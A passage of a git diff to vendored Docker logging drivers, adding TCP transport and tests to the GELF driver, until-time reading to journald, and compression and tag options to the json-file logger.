json.RawMessage } @@ -41,44 +38,46 @@ func init() { // New creates a gelf logger using the configuration passed in on the // context. The supported context configuration variable is gelf-address. -func New(ctx logger.Context) (logger.Logger, error) { +func New(info logger.Info) (logger.Logger, error) { // parse gelf address - address, err := parseAddress(ctx.Config["gelf-address"]) + address, err := parseAddress(info.Config["gelf-address"]) if err != nil { return nil, err } // collect extra data for GELF message - hostname, err := ctx.Hostname() + hostname, err := info.Hostname() if err != nil { return nil, fmt.Errorf("gelf: cannot access hostname to set source field") } - // remove trailing slash from container name - containerName := bytes.TrimLeft([]byte(ctx.ContainerName), "/") - // parse log tag - tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + tag, err := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate) if err != nil { return nil, err } extra := map[string]interface{}{ - "_container_id": ctx.ContainerID, - "_container_name": string(containerName), - "_image_id": ctx.ContainerImageID, - "_image_name": ctx.ContainerImageName, - "_command": ctx.Command(), + "_container_id": info.ContainerID, + "_container_name": info.Name(), + "_image_id": info.ContainerImageID, + "_image_name": info.ContainerImageName, + "_command": info.Command(), "_tag": tag, - "_created": ctx.ContainerCreated, + "_created": info.ContainerCreated, } - extraAttrs := ctx.ExtraAttributes(func(key string) string { + extraAttrs, err := info.ExtraAttributes(func(key string) string { if key[0] == '_' { return key } return "_" + key }) + + if err != nil { + return nil, err + } + for k, v := range extraAttrs { extra[k] = v } @@ -88,13 +87,61 @@ func New(ctx logger.Context) (logger.Logger, error) { return nil, err } - // create new gelfWriter - gelfWriter, err := gelf.NewWriter(address) + var gelfWriter gelf.Writer + if address.Scheme == "udp" { + gelfWriter, err = newGELFUDPWriter(address.Host, info) + if err != nil { + return nil, err + } + } else if address.Scheme == "tcp" { + gelfWriter, err = newGELFTCPWriter(address.Host, info) + if err != nil { + return nil, err + } + } + + return &gelfLogger{ + writer: gelfWriter, + info: info, + hostname: hostname, + rawExtra: rawExtra, + }, nil +} + +// create new TCP gelfWriter +func newGELFTCPWriter(address string, info logger.Info) (gelf.Writer, error) { + gelfWriter, err := gelf.NewTCPWriter(address) + if err != nil { + return nil, fmt.Errorf("gelf: cannot connect to GELF endpoint: %s %v", address, err) + } + + if v, ok := info.Config["gelf-tcp-max-reconnect"]; ok { + i, err := strconv.Atoi(v) + if err != nil || i < 0 { + return nil, fmt.Errorf("gelf-tcp-max-reconnect must be a positive integer") + } + gelfWriter.MaxReconnect = i + } + + if v, ok := info.Config["gelf-tcp-reconnect-delay"]; ok { + i, err := strconv.Atoi(v) + if err != nil || i < 0 { + return nil, fmt.Errorf("gelf-tcp-reconnect-delay must be a positive integer") + } + gelfWriter.ReconnectDelay = time.Duration(i) + } + + return gelfWriter, nil +} + +// create new UDP gelfWriter +func newGELFUDPWriter(address string, info logger.Info) (gelf.Writer, error) { + gelfWriter, err := gelf.NewUDPWriter(address) if err != nil { return nil, fmt.Errorf("gelf: cannot connect to GELF endpoint: %s %v", address, err) } - if v, ok := ctx.Config["gelf-compression-type"]; ok { + if v, ok := info.Config["gelf-compression-type"]; ok { switch v { case "gzip": gelfWriter.CompressionType = gelf.CompressGzip @@ -107,7 +154,7 @@ func New(ctx logger.Context) (logger.Logger, error) { } } - if v, ok := ctx.Config["gelf-compression-level"]; ok { + if v, ok := info.Config["gelf-compression-level"]; ok { val, err := strconv.Atoi(v) if err != nil { return nil, fmt.Errorf("gelf: invalid compression level %s, err %v", v, err) @@ -115,12 +162,7 @@ func New(ctx logger.Context) (logger.Logger, error) { gelfWriter.CompressionLevel = val } - return &gelfLogger{ - writer: gelfWriter, - ctx: ctx, - hostname: hostname, - rawExtra: rawExtra, - }, nil + return gelfWriter, nil } func (s *gelfLogger) Log(msg *logger.Message) error { @@ -134,9 +176,10 @@ func (s *gelfLogger) Log(msg *logger.Message) error { Host: s.hostname, Short: string(msg.Line), TimeUnix: float64(msg.Timestamp.UnixNano()/int64(time.Millisecond)) / 1000.0, - Level: level, + Level: int32(level), RawExtra: s.rawExtra, } + logger.PutMessage(msg) if err := s.writer.WriteMessage(&m); err != nil { return fmt.Errorf("gelf: cannot send GELF message: %v", err) @@ -154,56 +197,72 @@ func (s *gelfLogger) Name() string { // ValidateLogOpt looks for gelf specific log option gelf-address. func ValidateLogOpt(cfg map[string]string) error { + address, err := parseAddress(cfg["gelf-address"]) + if err != nil { + return err + } + for key, val := range cfg { switch key { case "gelf-address": case "tag": case "labels": case "env": + case "env-regex": case "gelf-compression-level": + if address.Scheme != "udp" { + return fmt.Errorf("compression is only supported on UDP") + } i, err := strconv.Atoi(val) if err != nil || i < flate.DefaultCompression || i > flate.BestCompression { return fmt.Errorf("unknown value %q for log opt %q for gelf log driver", val, key) } case "gelf-compression-type": + if address.Scheme != "udp" { + return fmt.Errorf("compression is only supported on UDP") + } switch val { case "gzip", "zlib", "none": default: return fmt.Errorf("unknown value %q for log opt %q for gelf log driver", val, key) } + case "gelf-tcp-max-reconnect", "gelf-tcp-reconnect-delay": + if address.Scheme != "tcp" { + return fmt.Errorf("%q is only valid for TCP", key) + } + i, err := strconv.Atoi(val) + if err != nil || i < 0 { + return fmt.Errorf("%q must be a positive integer", key) + } default: return fmt.Errorf("unknown log opt %q for gelf log driver", key) } } - if _, err := parseAddress(cfg["gelf-address"]); err != nil { - return err - } - return nil } -func parseAddress(address string) (string, error) { +func parseAddress(address string) (*url.URL, error) { if address == "" { - return "", nil + return nil, fmt.Errorf("gelf-address is a required parameter") } if !urlutil.IsTransportURL(address) { - return "", fmt.Errorf("gelf-address should be in form proto://address, got %v", address) + return nil, fmt.Errorf("gelf-address should be in form proto://address, got %v", address) } url, err := url.Parse(address) if err != nil { - return "", err + return nil, err } // we support only udp - if url.Scheme != "udp" { - return "", fmt.Errorf("gelf: endpoint needs to be UDP") + if url.Scheme != "udp" && url.Scheme != "tcp" { + return nil, fmt.Errorf("gelf: endpoint needs to be TCP or UDP") } // get host and port if _, _, err = net.SplitHostPort(url.Host); err != nil { - return "", fmt.Errorf("gelf: please provide gelf-address as udp://host:port") + return nil, fmt.Errorf("gelf: please provide gelf-address as proto://host:port") } - return url.Host, nil + return url, nil } diff --git a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_test.go b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_test.go new file mode 100644 index 0000000000..a88d56ce16 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_test.go @@ -0,0 +1,260 @@ +// +build linux + +package gelf // import "github.com/docker/docker/daemon/logger/gelf" + +import ( + "net" + "testing" + + "github.com/docker/docker/daemon/logger" +) + +// Validate parseAddress +func TestParseAddress(t *testing.T) { + url, err := parseAddress("udp://127.0.0.1:12201") + if err != nil { + t.Fatal(err) + } + if url.String() != "udp://127.0.0.1:12201" { + t.Fatalf("Expected address udp://127.0.0.1:12201, got %s", url.String()) + } + + _, err = parseAddress("127.0.0.1:12201") + if err == nil { + t.Fatal("Expected error requiring protocol") + } + + _, err = parseAddress("http://127.0.0.1:12201") + if err == nil { + t.Fatal("Expected error restricting protocol") + } +} + +// Validate TCP options +func TestTCPValidateLogOpt(t *testing.T) { + err := ValidateLogOpt(map[string]string{ + "gelf-address": "tcp://127.0.0.1:12201", + }) + if err != nil { + t.Fatal("Expected TCP to be supported") + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": "tcp://127.0.0.1:12201", + "gelf-compression-level": "9", + }) + if err == nil { + t.Fatal("Expected TCP to reject compression level") + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": "tcp://127.0.0.1:12201", + "gelf-compression-type": "gzip", + }) + if err == nil { + t.Fatal("Expected TCP to reject compression type") + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": "tcp://127.0.0.1:12201", + "gelf-tcp-max-reconnect": "5", + "gelf-tcp-reconnect-delay": "10", + }) + if err != nil { + t.Fatal("Expected TCP reconnect to be a valid parameters") + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": "tcp://127.0.0.1:12201", + "gelf-tcp-max-reconnect": "-1", + "gelf-tcp-reconnect-delay": "-3", + }) + if err == nil { + t.Fatal("Expected negative TCP reconnect to be rejected") + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": "tcp://127.0.0.1:12201", + "gelf-tcp-max-reconnect": "invalid", + "gelf-tcp-reconnect-delay": "invalid", + }) + if err == nil { + t.Fatal("Expected TCP reconnect to be required to be an int") + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": "udp://127.0.0.1:12201", + "gelf-tcp-max-reconnect": "1", + "gelf-tcp-reconnect-delay": "3", + }) + if err == nil { + t.Fatal("Expected TCP reconnect to be invalid for UDP") + } +} + +// Validate UDP options +func TestUDPValidateLogOpt(t *testing.T) { + err := ValidateLogOpt(map[string]string{ + "gelf-address": "udp://127.0.0.1:12201", + "tag": "testtag", + "labels": "testlabel", + "env": "testenv", + "env-regex": "testenv-regex", + "gelf-compression-level": "9", + "gelf-compression-type": "gzip", + }) + if err != nil { + t.Fatal(err) + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": "udp://127.0.0.1:12201", + "gelf-compression-level": "ultra", + "gelf-compression-type": "zlib", + }) + if err == nil { + t.Fatal("Expected compression level error") + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": "udp://127.0.0.1:12201", + "gelf-compression-type": "rar", + }) + if err == nil { + t.Fatal("Expected compression type error") + } + + err = ValidateLogOpt(map[string]string{ + "invalid": "invalid", + }) + if err == nil { + t.Fatal("Expected unknown option error") + } + + err = ValidateLogOpt(map[string]string{}) + if err == nil { + t.Fatal("Expected required parameter error") + } +} + +// Validate newGELFTCPWriter +func TestNewGELFTCPWriter(t *testing.T) { + address := "127.0.0.1:0" + tcpAddr, err := net.ResolveTCPAddr("tcp", address) + if err != nil { + t.Fatal(err) + } + + listener, err := net.ListenTCP("tcp", tcpAddr) + if err != nil { + t.Fatal(err) + } + + url := "tcp://" + listener.Addr().String() + info := logger.Info{ + Config: map[string]string{ + "gelf-address": url, + "gelf-tcp-max-reconnect": "0", + "gelf-tcp-reconnect-delay": "0", + "tag": "{{.ID}}", + }, + ContainerID: "12345678901234567890", + } + + writer, err := newGELFTCPWriter(listener.Addr().String(), info) + if err != nil { + t.Fatal(err) + } + + err = writer.Close() + if err != nil { + t.Fatal(err) + } + + err = listener.Close() + if err != nil { + t.Fatal(err) + } +} + +// Validate newGELFUDPWriter +func TestNewGELFUDPWriter(t *testing.T) { + address := "127.0.0.1:0" + info := logger.Info{ + Config: map[string]string{ + "gelf-address": "udp://127.0.0.1:0", + "gelf-compression-level": "5", + "gelf-compression-type": "gzip", + }, + } + + writer, err := newGELFUDPWriter(address, info) + if err != nil { + t.Fatal(err) + } + writer.Close() + if err != nil { + t.Fatal(err) + } +} + +// Validate New for TCP +func TestNewTCP(t *testing.T) { + address := "127.0.0.1:0" + tcpAddr, err := net.ResolveTCPAddr("tcp", address) + if err != nil { + t.Fatal(err) + } + + listener, err := net.ListenTCP("tcp", tcpAddr) + if err != nil { + t.Fatal(err) + } + + url := "tcp://" + listener.Addr().String() + info := logger.Info{ + Config: map[string]string{ + "gelf-address": url, + "gelf-tcp-max-reconnect": "0", + "gelf-tcp-reconnect-delay": "0", + }, + ContainerID: "12345678901234567890", + } + + logger, err := New(info) + if err != nil { + t.Fatal(err) + } + + err = logger.Close() + if err != nil { + t.Fatal(err) + } + + err = listener.Close() + if err != nil { + t.Fatal(err) + } +} + +// Validate New for UDP +func TestNewUDP(t *testing.T) { + info := logger.Info{ + Config: map[string]string{ + "gelf-address": "udp://127.0.0.1:0", + "gelf-compression-level": "5", + "gelf-compression-type": "gzip", + }, + ContainerID: "12345678901234567890", + } + + logger, err := New(info) + if err != nil { + t.Fatal(err) + } + + err = logger.Close() + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go deleted file mode 100644 index 266f73b18b..0000000000 --- a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go +++ /dev/null @@ -1,3 +0,0 @@ -// +build !linux - -package gelf diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald.go index 9569859121..342e18f57f 100644 --- a/vendor/github.com/docker/docker/daemon/logger/journald/journald.go +++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald.go @@ -2,28 +2,29 @@ // Package journald provides the log driver for forwarding server logs // to endpoints that receive the systemd format. -package journald +package journald // import "github.com/docker/docker/daemon/logger/journald" import ( "fmt" "sync" "unicode" - "github.com/Sirupsen/logrus" "github.com/coreos/go-systemd/journal" "github.com/docker/docker/daemon/logger" "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/sirupsen/logrus" ) const name = "journald" type journald struct { + mu sync.Mutex vars map[string]string // additional variables and values to send to the journal along with the log message readers readerList + closed bool } type readerList struct { - mu sync.Mutex readers map[*logger.LogWatcher]*logger.LogWatcher } @@ -58,30 +59,28 @@ func sanitizeKeyMod(s string) string { // New creates a journald logger using the configuration passed in on // the context. -func New(ctx logger.Context) (logger.Logger, error) { +func New(info logger.Info) (logger.Logger, error) { if !journal.Enabled() { return nil, fmt.Errorf("journald is not enabled on this host") } - // Strip a leading slash so that people can search for - // CONTAINER_NAME=foo rather than CONTAINER_NAME=/foo. - name := ctx.ContainerName - if name[0] == '/' { - name = name[1:] - } // parse log tag - tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + tag, err := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate) if err != nil { return nil, err } vars := map[string]string{ - "CONTAINER_ID": ctx.ContainerID[:12], - "CONTAINER_ID_FULL": ctx.ContainerID, - "CONTAINER_NAME": name, + "CONTAINER_ID": info.ContainerID[:12], + "CONTAINER_ID_FULL": info.ContainerID, + "CONTAINER_NAME": info.Name(), "CONTAINER_TAG": tag, + "SYSLOG_IDENTIFIER": tag, + } + extraAttrs, err := info.ExtraAttributes(sanitizeKeyMod) + if err != nil { + return nil, err } - extraAttrs := ctx.ExtraAttributes(sanitizeKeyMod) for k, v := range extraAttrs { vars[k] = v } @@ -95,6 +94,7 @@ func validateLogOpt(cfg map[string]string) error { switch key { case "labels": case "env": + case "env-regex": case "tag": default: return fmt.Errorf("unknown log opt '%s' for journald log driver", key) @@ -108,13 +108,18 @@ func (s *journald) Log(msg *logger.Message) error { for k, v := range s.vars { vars[k] = v } - if msg.Partial { + if msg.PLogMetaData != nil { vars["CONTAINER_PARTIAL_MESSAGE"] = "true" } - if msg.Source == "stderr" { - return journal.Send(string(msg.Line), journal.PriErr, vars) + + line := string(msg.Line) + source := msg.Source + logger.PutMessage(msg) + + if source == "stderr" { + return journal.Send(line, journal.PriErr, vars) } - return journal.Send(string(msg.Line), journal.PriInfo, vars) + return journal.Send(line, journal.PriInfo, vars) } func (s *journald) Name() string { diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go index 224423fd07..bd7bf7a3b3 100644 --- a/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go @@ -1,6 +1,6 @@ // +build linux -package journald +package journald // import "github.com/docker/docker/daemon/logger/journald" import ( "testing" diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go index d52ca92e4f..7899fc1214 100644 --- a/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package journald +package journald // import "github.com/docker/docker/daemon/logger/journald" type journald struct { } diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read.go b/vendor/github.com/docker/docker/daemon/logger/journald/read.go index d91eb809bc..d4bcc62d9a 100644 --- a/vendor/github.com/docker/docker/daemon/logger/journald/read.go +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read.go @@ -1,6 +1,6 @@ // +build linux,cgo,!static_build,journald -package journald +package journald // import "github.com/docker/docker/daemon/logger/journald" // #include // #include @@ -155,27 +155,31 @@ import ( "time" "unsafe" - "github.com/Sirupsen/logrus" "github.com/coreos/go-systemd/journal" + "github.com/docker/docker/api/types/backend" "github.com/docker/docker/daemon/logger" + "github.com/sirupsen/logrus" ) func (s *journald) Close() error { - s.readers.mu.Lock() + s.mu.Lock() + s.closed = true for reader := range s.readers.readers { reader.Close() } - s.readers.mu.Unlock() + s.mu.Unlock() return nil } -func (s *journald) drainJournal(logWatcher *logger.LogWatcher, config logger.ReadConfig, j *C.sd_journal, oldCursor *C.char) *C.char { +func (s *journald) drainJournal(logWatcher *logger.LogWatcher, j *C.sd_journal, oldCursor *C.char, untilUnixMicro uint64) (*C.char, bool) { var msg, data, cursor *C.char var length C.size_t var stamp C.uint64_t var priority, partial C.int + var done bool - // Walk the journal from here forward until we run out of new entries. + // Walk the journal from here forward until we run out of new entries + // or we reach the until value (if provided). drain: for { // Try not to send a given entry twice. @@ -193,6 +197,12 @@ drain: if C.sd_journal_get_realtime_usec(j, &stamp) != 0 { break } + // Break if the timestamp exceeds any provided until flag. + if untilUnixMicro != 0 && untilUnixMicro < uint64(stamp) { + done = true + break + } + // Set up the time and text of the entry. timestamp := time.Unix(int64(stamp)/1000000, (int64(stamp)%1000000)*1000) line := C.GoBytes(unsafe.Pointer(msg), C.int(length)) @@ -212,14 +222,11 @@ drain: source = "stdout" } // Retrieve the values of any variables we're adding to the journal. - attrs := make(map[string]string) + var attrs []backend.LogAttr C.sd_journal_restart_data(j) for C.get_attribute_field(j, &data, &length) > C.int(0) { kv := strings.SplitN(C.GoStringN(data, C.int(length)), "=", 2) - attrs[kv[0]] = kv[1] - } - if len(attrs) == 0 { - attrs = nil + attrs = append(attrs, backend.LogAttr{Key: kv[0], Value: kv[1]}) } // Send the log message. logWatcher.Msg <- &logger.Message{ @@ -237,41 +244,65 @@ drain: // free(NULL) is safe C.free(unsafe.Pointer(oldCursor)) - C.sd_journal_get_cursor(j, &cursor) - return cursor + if C.sd_journal_get_cursor(j, &cursor) != 0 { + // ensure that we won't be freeing an address that's invalid + cursor = nil + } + return cursor, done } -func (s *journald) followJournal(logWatcher *logger.LogWatcher, config logger.ReadConfig, j *C.sd_journal, pfd [2]C.int, cursor *C.char) *C.char { - s.readers.mu.Lock() +func (s *journald) followJournal(logWatcher *logger.LogWatcher, j *C.sd_journal, pfd [2]C.int, cursor *C.char, untilUnixMicro uint64) *C.char { + s.mu.Lock() s.readers.readers[logWatcher] = logWatcher - s.readers.mu.Unlock() + if s.closed { + // the journald Logger is closed, presumably because the container has been + // reset. So we shouldn't follow, because we'll never be woken up. But we + // should make one more drainJournal call to be sure we've got all the logs. + // Close pfd[1] so that one drainJournal happens, then cleanup, then return. + C.close(pfd[1]) + } + s.mu.Unlock() + + newCursor := make(chan *C.char) + go func() { - // Keep copying journal data out until we're notified to stop - // or we hit an error. - status := C.wait_for_data_cancelable(j, pfd[0]) - for status == 1 { - cursor = s.drainJournal(logWatcher, config, j, cursor) - status = C.wait_for_data_cancelable(j, pfd[0]) - } - if status < 0 { - cerrstr := C.strerror(C.int(-status)) - errstr := C.GoString(cerrstr) - fmtstr := "error %q while attempting to follow journal for container %q" - logrus.Errorf(fmtstr, errstr, s.vars["CONTAINER_ID_FULL"]) + for { + // Keep copying journal data out until we're notified to stop + // or we hit an error. + status := C.wait_for_data_cancelable(j, pfd[0]) + if status < 0 { + cerrstr := C.strerror(C.int(-status)) + errstr := C.GoString(cerrstr) + fmtstr := "error %q while attempting to follow journal for container %q" + logrus.Errorf(fmtstr, errstr, s.vars["CONTAINER_ID_FULL"]) + break + } + + var done bool + cursor, done = s.drainJournal(logWatcher, j, cursor, untilUnixMicro) + + if status != 1 || done { + // We were notified to stop + break + } } + // Clean up. C.close(pfd[0]) - s.readers.mu.Lock() + s.mu.Lock() delete(s.readers.readers, logWatcher) - s.readers.mu.Unlock() - C.sd_journal_close(j) + s.mu.Unlock() close(logWatcher.Msg) + newCursor <- cursor }() + // Wait until we're told to stop. select { + case cursor = <-newCursor: case <-logWatcher.WatchClose(): // Notify the other goroutine that its work is done. C.close(pfd[1]) + cursor = <-newCursor } return cursor @@ -282,6 +313,7 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon var cmatch, cursor *C.char var stamp C.uint64_t var sinceUnixMicro uint64 + var untilUnixMicro uint64 var pipes [2]C.int // Get a handle to the journal. @@ -298,9 +330,9 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon following := false defer func(pfollowing *bool) { if !*pfollowing { - C.sd_journal_close(j) close(logWatcher.Msg) } + C.sd_journal_close(j) }(&following) // Remove limits on the size of data items that we'll retrieve. rc = C.sd_journal_set_data_threshold(j, C.size_t(0)) @@ -321,10 +353,19 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon nano := config.Since.UnixNano() sinceUnixMicro = uint64(nano / 1000) } + // If we have an until value, convert it too + if !config.Until.IsZero() { + nano := config.Until.UnixNano() + untilUnixMicro = uint64(nano / 1000) + } if config.Tail > 0 { lines := config.Tail - // Start at the end of the journal. - if C.sd_journal_seek_tail(j) < 0 { + // If until time provided, start from there. + // Otherwise start at the end of the journal. + if untilUnixMicro != 0 && C.sd_journal_seek_realtime_usec(j, C.uint64_t(untilUnixMicro)) < 0 { + logWatcher.Err <- fmt.Errorf("error seeking provided until value") + return + } else if C.sd_journal_seek_tail(j) < 0 { logWatcher.Err <- fmt.Errorf("error seeking to end of journal") return } @@ -340,8 +381,7 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon if C.sd_journal_get_realtime_usec(j, &stamp) != 0 { break } else { - // Compare the timestamp on the entry - // to our threshold value. + // Compare the timestamp on the entry to our threshold value. if sinceUnixMicro != 0 && sinceUnixMicro > uint64(stamp) { break } @@ -370,7 +410,7 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon return } } - cursor = s.drainJournal(logWatcher, config, j, nil) + cursor, _ = s.drainJournal(logWatcher, j, nil, untilUnixMicro) if config.Follow { // Allocate a descriptor for following the journal, if we'll // need one. Do it here so that we can report if it fails. @@ -382,7 +422,7 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon if C.pipe(&pipes[0]) == C.int(-1) { logWatcher.Err <- fmt.Errorf("error opening journald close notification pipe") } else { - cursor = s.followJournal(logWatcher, config, j, pipes, cursor) + cursor = s.followJournal(logWatcher, j, pipes, cursor, untilUnixMicro) // Let followJournal handle freeing the journal context // object and closing the channel. following = true diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go index bba6de55be..ab68cf4ba7 100644 --- a/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go @@ -1,6 +1,6 @@ // +build linux,cgo,!static_build,journald,!journald_compat -package journald +package journald // import "github.com/docker/docker/daemon/logger/journald" // #cgo pkg-config: libsystemd import "C" diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go index 3f7a43c59e..4806e130ef 100644 --- a/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go @@ -1,6 +1,6 @@ // +build linux,cgo,!static_build,journald,journald_compat -package journald +package journald // import "github.com/docker/docker/daemon/logger/journald" // #cgo pkg-config: libsystemd-journal import "C" diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go index b43abdcaf7..a66b666659 100644 --- a/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go @@ -1,6 +1,6 @@ // +build !linux !cgo static_build !journald -package journald +package journald // import "github.com/docker/docker/daemon/logger/journald" func (s *journald) Close() error { return nil diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go index a429a08a4f..b806a5ad17 100644 --- a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go @@ -1,7 +1,7 @@ // Package jsonfilelog provides the default Logger implementation for // Docker logging. This logger logs to files on the host server in the // JSON format. -package jsonfilelog +package jsonfilelog // import "github.com/docker/docker/daemon/logger/jsonfilelog" import ( "bytes" @@ -10,11 +10,12 @@ import ( "strconv" "sync" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" "github.com/docker/docker/daemon/logger/loggerutils" - "github.com/docker/docker/pkg/jsonlog" "github.com/docker/go-units" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // Name is the name of the file that the jsonlogger logs to. @@ -22,11 +23,11 @@ const Name = "json-file" // JSONFileLogger is Logger implementation for default Docker logging. type JSONFileLogger struct { - buf *bytes.Buffer - writer *loggerutils.RotateFileWriter mu sync.Mutex + closed bool + writer *loggerutils.LogFile readers map[*logger.LogWatcher]struct{} // stores the active log followers - extra []byte // json-encoded extra attributes + tag string // tag values requested by the user to log } func init() { @@ -40,17 +41,20 @@ func init() { // New creates new JSONFileLogger which writes to filename passed in // on given context. -func New(ctx logger.Context) (logger.Logger, error) { +func New(info logger.Info) (logger.Logger, error) { var capval int64 = -1 - if capacity, ok := ctx.Config["max-size"]; ok { + if capacity, ok := info.Config["max-size"]; ok { var err error capval, err = units.FromHumanSize(capacity) if err != nil { return nil, err } + if capval <= 0 { + return nil, fmt.Errorf("max-size should be a positive numbler") + } } var maxFiles = 1 - if maxFileString, ok := ctx.Config["max-file"]; ok { + if maxFileString, ok := info.Config["max-file"]; ok { var err error maxFiles, err = strconv.Atoi(maxFileString) if err != nil { @@ -61,13 +65,34 @@ func New(ctx logger.Context) (logger.Logger, error) { } } - writer, err := loggerutils.NewRotateFileWriter(ctx.LogPath, capval, maxFiles) + var compress bool + if compressString, ok := info.Config["compress"]; ok { + var err error + compress, err = strconv.ParseBool(compressString) + if err != nil { + return nil, err + } + if compress && (maxFiles == 1 || capval == -1) { + return nil, fmt.Errorf("compress cannot be true when max-file is less than 2 or max-size is not set") + } + } + + attrs, err := info.ExtraAttributes(nil) if err != nil { return nil, err } + // no default template. only use a tag if the user asked for it + tag, err := loggerutils.ParseLogTag(info, "") + if err != nil { + return nil, err + } + if tag != "" { + attrs["tag"] = tag + } + var extra []byte - if attrs := ctx.ExtraAttributes(nil); len(attrs) > 0 { + if len(attrs) > 0 { var err error extra, err = json.Marshal(attrs) if err != nil { @@ -75,42 +100,52 @@ func New(ctx logger.Context) (logger.Logger, error) { } } + buf := bytes.NewBuffer(nil) + marshalFunc := func(msg *logger.Message) ([]byte, error) { + if err := marshalMessage(msg, extra, buf); err != nil { + return nil, err + } + b := buf.Bytes() + buf.Reset() + return b, nil + } + + writer, err := loggerutils.NewLogFile(info.LogPath, capval, maxFiles, compress, marshalFunc, decodeFunc, 0640) + if err != nil { + return nil, err + } + return &JSONFileLogger{ - buf: bytes.NewBuffer(nil), writer: writer, readers: make(map[*logger.LogWatcher]struct{}), - extra: extra, + tag: tag, }, nil } // Log converts logger.Message to jsonlog.JSONLog and serializes it to file. func (l *JSONFileLogger) Log(msg *logger.Message) error { - timestamp, err := jsonlog.FastTimeMarshalJSON(msg.Timestamp) - if err != nil { - return err - } l.mu.Lock() - logline := msg.Line - if !msg.Partial { - logline = append(msg.Line, '\n') + err := l.writer.WriteLogEntry(msg) + l.mu.Unlock() + return err +} + +func marshalMessage(msg *logger.Message, extra json.RawMessage, buf *bytes.Buffer) error { + logLine := msg.Line + if msg.PLogMetaData == nil || (msg.PLogMetaData != nil && msg.PLogMetaData.Last) { + logLine = append(msg.Line, '\n') } - err = (&jsonlog.JSONLogs{ - Log: logline, + err := (&jsonlog.JSONLogs{ + Log: logLine, Stream: msg.Source, - Created: timestamp, - RawAttrs: l.extra, - }).MarshalJSONBuf(l.buf) + Created: msg.Timestamp, + RawAttrs: extra, + }).MarshalJSONBuf(buf) if err != nil { - l.mu.Unlock() - return err + return errors.Wrap(err, "error writing log message to buffer") } - - l.buf.WriteByte('\n') - _, err = l.writer.Write(l.buf.Bytes()) - l.buf.Reset() - l.mu.Unlock() - - return err + err = buf.WriteByte('\n') + return errors.Wrap(err, "error finalizing log buffer") } // ValidateLogOpt looks for json specific log options max-file & max-size. @@ -119,8 +154,11 @@ func ValidateLogOpt(cfg map[string]string) error { switch key { case "max-file": case "max-size": + case "compress": case "labels": case "env": + case "env-regex": + case "tag": default: return fmt.Errorf("unknown log opt '%s' for json-file log driver", key) } @@ -128,14 +166,10 @@ func ValidateLogOpt(cfg map[string]string) error { return nil } -// LogPath returns the location the given json logger logs to. -func (l *JSONFileLogger) LogPath() string { - return l.writer.LogPath() -} - // Close closes underlying file and signals all readers to stop. func (l *JSONFileLogger) Close() error { l.mu.Lock() + l.closed = true err := l.writer.Close() for r := range l.readers { r.Close() diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go index b5b818a8ba..22bbcf2eb7 100644 --- 